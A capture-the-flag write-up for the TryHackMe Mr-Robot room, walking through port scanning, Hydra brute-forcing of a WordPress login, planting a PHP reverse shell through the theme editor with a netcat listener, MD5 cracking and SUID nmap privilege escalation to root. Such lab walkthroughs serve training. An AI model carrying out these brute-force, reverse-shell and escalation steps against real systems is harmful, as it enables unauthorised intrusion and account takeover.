Mr-Robot — TryHackMe — WriteUp

Hello everyone. I’m Rahmos. Here is my Mr-Robot — TryHackMe — WriteUp. Check it out!

1/ The first key

First of all, let's nmap the <ip> to see which ports are open.

nmap -A -T4 -p- -vv <ip>

nmap

You can see that ports 80 and 443 are open, which means an Apache web server is running on this machine.

So let’s check the website at port 80:

The site first shows a video and some commands. It's not really useful for finding information.

Take a look at the "Hint": it says "Robots". Let's go to "http://<ip>/robots.txt"

robots.txt

Here I can see the first key file: key-1-of-3.txt

Go to “http://<ip>/key-1-of-3.txt”

1st key

2/ The second key

The “Hint” says: White color font. Not really clear, right? So let’s find out.

Roll back to robots.txt: there is a file called "fsocity.dic". Let's download the file using wget:

wget -O robotpasswd.txt http://<ip>/fsocity.dic

*I chose robotpasswd.txt as my filename; you can choose any name you want.

Take a look at the file I've just downloaded. It looks like a large password list. So up next, I need to brute-force the password.

However, which page am I going to log in to? Let's use dirbuster to search for hidden directories on the website.

Alternatively you can use gobuster if you prefer CLI. Here’s the command:

gobuster dir -u http://<ip> -w /path-to-wordlist

dirbuster

Here you can see the wp-login page responds with status code 200, which means we can access it. Moreover, we now know the site is running WordPress.

wp-login

Access "http://<ip>/wp-login.php". I can now brute-force the username and password using Hydra.

Hydra

I need to get the HTTP POST form parameters first, because Hydra requires that information to operate.

Using Burp Suite to intercept the request, I can get the http-post-form parameters. Just enter any username and password and click login.

Burpsuite

The login page gives the notification: “Invalid username”. Note that for Hydra.

Invalid Username

Now, let’s use Hydra to get the username first:

hydra -L robotpasswd.txt -p test <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30 -I -f

Hydra got the username

I've got the username "Elliot". Let's try logging in with this username.

Invalid password

A different message appears for a wrong password. Note that for Hydra.

Now let’s Hydra the password!

hydra -l Elliot -P robotpasswd.txt <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -I -f

Wait a while and I've got the correct password: ER28-0652

Log in, and now I can access the admin page:

Admin Page

Now, let’s find a way to upload php-reverse-shell to the webpage.

In wp-admin, go to the left navigation bar, select Appearance → Editor, and then select Archives (archive.php) on the right.

Paste the content of php-reverse-shell into archive.php.

*Remember to change the <ip> address in the script to your TryHackMe OpenVPN address. You can find it by opening 10.10.10.10 in your browser.

Change the IP address

Click Update, then open netcat to listen on port 1234:

nc -lvnp 1234

Open “http://<ip>/wp-content/themes/twentyfifteen/archive.php”

and I've got a reverse shell on the machine!

reverse shell

Spawn a tty shell using Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Move around to see files:

You can see key-2-of-3.txt. However, I cannot read this file as "daemon", so let's crack robot's password using the file "password.raw-md5".

robot’s password

Copy the MD5 hash and go to this link to crack robot's password:

robot’s password

Now let's su to robot using the password above. Got the 2nd key!

2nd key

3/ The final key

Let's move on to the final key. Look at the hint: it says "nmap". So I know that I can escalate privileges using nmap. Use find to look for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

find

Here you can see nmap! Open an interactive shell using nmap:

nmap --interactive

Run this command to get root:

!sh

Now I'm root!

root shell

Let’s cd to /root and get the final key!

final key

The end.

HAPPY HACKING

I’m Groot